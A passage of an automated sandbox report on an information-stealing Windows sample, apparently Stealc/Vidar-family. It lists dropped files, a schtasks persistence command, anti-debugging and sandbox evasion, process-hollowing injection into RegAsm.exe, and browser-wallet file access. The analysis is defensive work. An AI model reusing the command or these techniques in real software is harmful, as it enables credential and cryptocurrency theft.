Source: file.exe, wfuiQLTtHXbQiC1ZxG.cs High entropy of concatenated method names: 'M2UDtyVrB4', 'nW4lBacjpc', 'ldwDMxp3s1', 'SeWDGHE40v', 'IV0D8cSr66', 'j7TDmKVqJk', 'mq77Ie4Qrw', 'OU0yNb2MH', 'itJFM6TK5', 'qjVEXynix'
Source: file.exe, pRAp96D6PD3IeVWYk87.cs High entropy of concatenated method names: 'B4EDhvACmn', 'HvjD1fmugy', 'TTmDHarqx6', 'nc2DQ9r9u7', 'GAfDL9uTDN', 'VbRDlWmAIH', 'PNXDCxlR20', 'lLCD3opisD', 'XZ5DKOHdt1', 'TiYDrpIhkA'
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\ProgramData\HJJDGHCBGD.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\HJJDGHCBGD.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\l2[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\HJJDGHCBGD.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\ProgramData\HJJDGHCBGD.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Switches to a custom stack to bypass stack traces
Source: C:\ProgramData\HJJDGHCBGD.exe API/Special instruction interceptor: Address: 5DAFBF
Source: C:\ProgramData\HJJDGHCBGD.exe API/Special instruction interceptor: Address: 761C29
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe API/Special instruction interceptor: Address: 5DAFBF
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe API/Special instruction interceptor: Address: 761C29
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2B80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 4D50000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 6.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 7180 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 7180 Thread sleep time: -56250s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 2_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401160 GetSystemInfo,ExitProcess, 2_2_00401160
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: RegAsm.exe, 00000002.00000002.2378894358.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000002.00000002.2378894358.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2378894358.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00404610 VirtualProtect ?,00000004,00000100,00000000 2_2_00404610
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004195E0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419160 mov eax, dword ptr fs:[00000030h] 2_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 2_2_00405000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041C8D9 SetUnhandledExceptionFilter, 2_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C30B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6C30B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C30B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C30B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C4BAC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02D57F91 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_02D57F91
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_004190A0
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B52008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HJJDGHCBGD.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\HJJDGHCBGD.exe "C:\ProgramData\HJJDGHCBGD.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C30B341 cpuid 2_2_6C30B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 2_2_00417420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_004172F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_004174D0
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000002.1666020082.0000000001131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: file.exe, 00000000.00000002.1666020082.0000000001131000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.1662962002.0000000000A22000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: AVP.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.HJJDGHCBGD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected PureLog Stealer
Source: Yara match File source: file.exe, type: SAMPLE
Source: Yara match File source: 0.0.file.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1662962002.0000000000A22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000002.00000002.2378894358.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
